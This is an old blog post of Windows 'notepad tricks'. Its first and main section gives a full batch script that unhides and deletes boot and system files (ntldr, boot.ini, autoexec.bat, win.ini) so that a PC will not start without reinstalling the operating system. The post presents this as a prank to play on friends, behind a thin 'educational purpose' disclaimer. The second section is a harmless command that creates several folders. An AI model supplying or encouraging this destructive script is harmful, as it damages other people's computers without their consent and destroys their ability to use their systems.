Sunday, 30 March 2014

SHUT DOWN PC FOREVER

"The following article is just for educational purpose, for the one who wish to learn tricks in computer.The author does not hold any responsibility if someone uses it to harm others."

 Its always fun to to play pranks with your friends.

Messing with their  personal things and always trying to creats the worst situation for them and we laugh at them

And if we play a trick on their computer and if the PC wont start again!!!

A very simple trick in notepad and the computer wont start again without the re-installation of the operating system on it.



Open notepad and copy paste the following code in it.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Save the file with extension ".bat" (without quotes)
For example- file.bat

Now you wont dare to open the file. If you open it in your own computer, your own computer wont start without the re-installation of your operating system.

Creating May Folder Using A Single File-Notepad Trick




1     1)      Open  notepad.

2     2)      Type:
            MD 1 2 3 4 5 6 7 8 9 10 

3     3)      Save file as with extension “.bat” (without quotes)
            Example- file.bat

4     4)      Open the file.

5     5)      You will see ten new folders will be created with name  1,2,3,4,5,6,7,8,9,10.

6     6)      If you want to name the folders something else, then instead of numbers your can write
              some other names  in the notepad while coding the file.

  For example- MD ana mia jia sam tom

Folder will be created with names  ana, mia, jia ,sam ,tom .

Don’t forget to give spaces between the names you give to the folder.

              Enjoy creating a very large number of folder with one click.